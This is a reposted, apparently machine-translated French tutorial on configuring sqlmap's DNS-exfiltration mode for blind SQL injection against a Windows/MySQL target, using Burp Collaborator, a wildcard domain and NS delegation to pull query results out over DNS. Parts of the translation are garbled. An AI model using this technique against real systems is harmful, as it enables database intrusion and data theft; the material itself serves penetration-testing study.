Maison > Article > Opération et maintenance > Quelle est la méthode de configuration de l’injection sqlmap _dns ?

Quelle est la méthode de configuration de l’injection sqlmap _dns ?

WBOYavant: 2023-05-12 12:25:061362parcourir

Il y a trop peu d'articles sur Internet sur l'injection DNS pour sqlmap. Ils ne présentent que brièvement le paramètre --dns-domain. Les articles pratiques pertinents sont soit vagues, soit mentionnés d'un seul coup, ce qui les rend confus (principalement des plats). ), la clé n'est pas encore apportée par le patron). Puis j’ai recommencé en me référant aux méthodes sur Internet.

Les choses qui doivent être préparées sont sqlmap, l'injection aveugle de Windows, deux noms de domaine et un serveur réseau externe.

sqlmap _dns注入配置方法是什么

Une fois, alors que je faisais quelque chose, j'ai rencontré une injection aveugle de temps. Il s'agissait d'une machine Windows et je me suis souvenu de la méthode DNS. injection.

sqlmap _dns注入配置方法是什么

Avant de commencer, je prévois d'utiliser la commande --sql-shell de sqlmap pour tester la charge utile de l'injection DNS

# 🎜 🎜# sqlmap _dns注入配置方法是什么

Allez d'abord sur le client collaborateur dans burpsuite et copiez le nom de domaine qui nous a été attribué par burp

Utilisez sqlmap pour exécuter l'instruction sql

#🎜🎜 ## 🎜🎜#

La demande a été reçue dans burpsuite alors que Sqlmap est toujours en cours d'exécution. sqlmap _dns注入配置方法是什么

352E3 dans 352E3 dans 352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net 62E3134 est le résultat renvoyé après ex. exécution de la version(). sqlmap _dns注入配置方法是什么

Décoder pour obtenir la version de mysql. Eh bien, il n’y a rien de mal avec l’injection DNS à ce stade.

Préparez-vous à configurer deux noms de domaine. Certains articles sur Internet disent qu'un seul est bien, mais cela semble toujours plus gênant. De nombreux fournisseurs de serveurs de noms de domaine ne proposent pas certaines fonctions avancées, il est donc plus facile de le faire. préparez-en deux. sqlmap _dns注入配置方法是什么

www.a.com

www.b.com

Nous configurons d'abord le nom de domaine a-> #

Ajoutez simplement * pour effectuer une analyse panoramique et pointez vers l'IP de notre serveur réseau externe.

Configurons notre nom de domaine b->b.com

sqlmap _dns注入配置方法是什么

C'est encore plus simple, il suffit de modifier le nom de domaine directement Pour le DNS, remplissez simplement ns1.a.com ns2.a.com Vous n’avez rien d’autre à faire.

Attendez ensuite que le nom de domaine prenne effet. Nous allons sur le serveur du réseau externe pour tester si l'analyse est réussie #

sqlmap _dns注入配置方法是什么 Ensuite, la machine locale envoie un ping à hello.b.com et l'envoie au serveur externe. la demande de hello.b.com et la machine locale indique que l'hôte est introuvable. Ne vous inquiétez pas, car aucune résolution n'est définie. Maintenant que tout est configuré, nous pouvons utiliser sqlmap pour l'injection DNS.

Ajoutez simplement le paramètre --dns-domain=b.com --hex à Sqlmap

sqlmap _dns注入配置方法是什么

À cette étape, sqlmap restera bloqué et vous demandera de configurer une instance de serveur DNS

sqlmap _dns注入配置方法是什么 Direct ctrl+c

#🎜 🎜# Invite indiquant que la récupération des données via le canal DNS a réussi. sqlmap _dns注入配置方法是什么

La vitesse d'injection est aussi rapide que le rapport d'erreurs et l'union, vous n'avez donc plus à supporter la vitesse lente.

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

sql mysql .net windows

Déclaration：

Cet article est reproduit dans:. en cas de violation, veuillez contacter admin@php.cn Supprimer

Article précédent：Comment implémenter l'analyse de l'injection temporelle sqlmapArticle suivant：Comment implémenter l'analyse de l'injection temporelle sqlmap

Articles Liés

Voir plus